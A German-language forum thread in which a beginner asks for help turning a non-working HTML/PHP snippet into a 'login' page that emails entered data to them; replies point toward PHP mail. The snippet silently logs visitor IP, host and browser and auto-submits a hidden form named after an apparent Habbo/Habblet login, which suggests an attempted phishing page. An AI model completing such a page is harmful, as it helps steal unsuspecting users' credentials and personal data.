html login problem

  • Guten abend liebe mituser,
    mein erster post gleich eine frage ^^ nun gut...
    also, ich möchte gerne eine art login erstellen auf der seite, so wie ein formmailer, das die daten dann an meine email gesendet werden.
    könnte mir vllt wer mir ein paar tips geben oder gar den code, wie man das macht? im moment sieht der code bei mir so aus...

    <html><body onload='document.login.submit();'>
    <?php
    $ip = $REMOTE_ADDR;
    $host = gethostbyaddr($ip);
    $date = date('d/m/Y');
    $time = date('H:i:s');
    $browser = $HTTP_USER_AGENT;
    ?>
    <form action='mailto:meine mail' method='post' name='login' enctype='text/plain' id='login-habblet' class='login-habblet'>
    <input type='hidden' name='admin1' value='meine mail'>
    <input type='hidden' name='typemail' value='html'>
    </body></form></html>

    ist da irgendwas falsch? okay, ejder weiß das sich jetzt outlook öffnet, und das soll er ja auch nicht... einfach nur an meine mail schicken ...

    vielen dank im vorraus

  • juti danke, werd mich mal gleich ransetzen ^^ dakne schon mal ;)

    edit: wie ich eben gesehen habe, ist das eher für php ausgerichtet...
    gibt es nicht irgendwie ein html code dafür?

  • Nein, keinen HTML Code der unabhängig vom Broswer ist. Mann kann zwar mit mailto dem Aktuell installiertem E-Mail Prog dagen, amil nach da und da, aber wenns sowas beim Nutzer nich gibt, dann gehts halt net. Das kalppt eig. nur gut via PHP.

    Der, der weiß dass er nichts weiß, weiß mehr als der, der nicht weiß, dass er nichts weiß.

    Wer nach etwas fragt, geht grundsätzlich das Risiko ein, es auch zu bekommen!

  • via php okay... naja ich bin halt ein relativer anfänger, die sprachen kann ich zwar ein wenig, aber bin mir eben nicht so sicher :P
    wenn ich das jetzt per php mache, muss ich dann noch irgend was anderes haben außer die seite dann?

  • Du brauchst eben die Login/Logout Seiten. Eig. sonst nix, nur ohne Page + Inhalt bringt dir der Login ja nich viel xD

    Der, der weiß dass er nichts weiß, weiß mehr als der, der nicht weiß, dass er nichts weiß.

    Wer nach etwas fragt, geht grundsätzlich das Risiko ein, es auch zu bekommen!

  • Alles vorkauen möchte ich/wir dir nicht aber schau doch mal auf die mail seite :

    1. du erstellst eine .php datei zb mail.php


    2.


    Änderst du den Code wie du es willst und rufst die Datei auf, dann sollte ja ein email ankommen bei dir


    mfg